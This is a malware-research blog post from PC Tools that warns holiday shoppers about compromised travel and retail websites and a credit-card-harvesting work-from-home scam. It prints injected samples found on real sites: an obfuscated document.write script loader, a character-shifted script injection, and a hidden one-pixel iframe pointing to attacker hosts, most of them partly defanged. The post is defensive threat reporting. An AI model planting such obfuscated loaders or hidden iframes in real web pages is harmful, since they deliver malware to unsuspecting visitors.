Prepared by Steve Espino – PC Tools Malware Research Team
With the holidays just around the corner, people the world over are looking for the best deals on holiday packages and gifts for their friends and family. What better place to look than on the Internet—in the comfort of one’s own home and on one’s own digital devices? After all, travel sites that help eager holiday-goers find that perfect holiday getaway abound.
Yet while there are a host of legitimate travel and shopping websites, there are also, unfortunately, plenty of fraudulent websites posing as credible ones. And the threats don’t stop there; users also need to be aware that even legit travel and shopping-related websites may be prone to attacks. Although these trustworthy sites may appear ‘normal’ at first glance, there is often malicious code lurking beneath that puts your privacy at risk.
These are samples of legitimate sites that have been compromised with malicious invisible iframes or obfuscated scripts.
And below are some examples of these malicious scripts:
Users on the lookout for printable cards for Halloween and Hanukkah may have an embedded obfuscated malicious script to go with the cards:
This translates to an embedded script:
Here is an embedded obfuscated malicious script found in a website offering Yoga retreats in fantastic locations like Greece and India:
document.write(‘<script src=’+'h@^t@!$t$(p$^:#/)$&/$)n#(e$)w@s!$3$@i@!)n$)s!#i!d$)e##)r!$$-@(#c)(@o^@@))m^$.!)n$e&x)t@!&a&!&g^!@.#!c$@o!!m(!&).!(w)^$)i$@$n($$)d(o^!!w^#s&!l@$i#^v!e)^&-!^^c^!o^m).$c$o(#b#&^(a()$^l)#t$@t@(^r#!@u)&!e)&b(&l$@&!)u$#e(!$.&!(r^#&(!u@(:!&8#(!0!(8&^0#/#b#(&l!o)&g(^(f$!a$.))c$($o(@m$/((#!b)l(o!!#@g@)^f&#a&.)@c^#o!m#!/@)#g$(&o(^o@$)g(l(&e#$$.!@c$o^m$/))!w^^e^a#^@!t&#^@h)$$(e&r$.(@#c!o!m^/^!h(&#s!#b$$c((.)&c!@$o).&##&u(#k&!^#&/$)$^’.replace(/#|)|(|!|@|^|$|&/ig, ”)+’ defer=defer></scr’+'ipt>’);</
Which translates to:
<script src=hxxp://news<blocked>blue.ru:8080/blogf<blocked>.com/google.com/weather.com/hsbc.co.uk/ defer=defer></script>
This one is from a website selling wholesale designer merchandise:
var source =”=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00:6/23:/255/33:0tubut0tubut/kt#?=0tdsjqu?”; var result = “”;
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
The malicious script only executes when Windows users visit the site.
Deobfuscation reveals the following embedded script, which is designed to look like normal website statistics scripts in order to evade detection:
PC Tools also came across a travel website with pages that were injected all over with hidden, malicious iframes like this one:
<iframe width=”1″ height=”1″ src=”hxxp://st<blocked>7.info/traff/index2.php” style=”border: 0;”></iframe>
This hidden iframe runs a script from a malicious website, which allows the hackers to deliver any payload they desire–ranging from Fake AVs and password stealers to ransomware and worms that turn computers into ‘zombies’ as part of a large bot network.
In another instance, unsuspecting users are offered the opportunity to start earning money from home immediately. The scam entices users to sign up quickly by falsely claiming that there are very few positions remaining.
When users try to leave the page, the site offers them a chat with an “Agent” to “secure your position.” Users may be tricked into thinking that the agent is authentic when, in fact, it is often an automated bot.
When users sign up, they are asked for their credit card details. This could result in massive fraudulent charges and even identity theft. For more information on identity theft, please visit the PC Tools Blog entry on the subject by clicking here.
PC Tools advises against entering credit card information on any suspicious forms or sites. Victims of these attacks are strongly advised to contact their credit card companies immediately to dispute any anomalous transactions and to ensure that there will be no future unauthorized charges.
We wish everyone a virus-free and scam-free Holiday Season!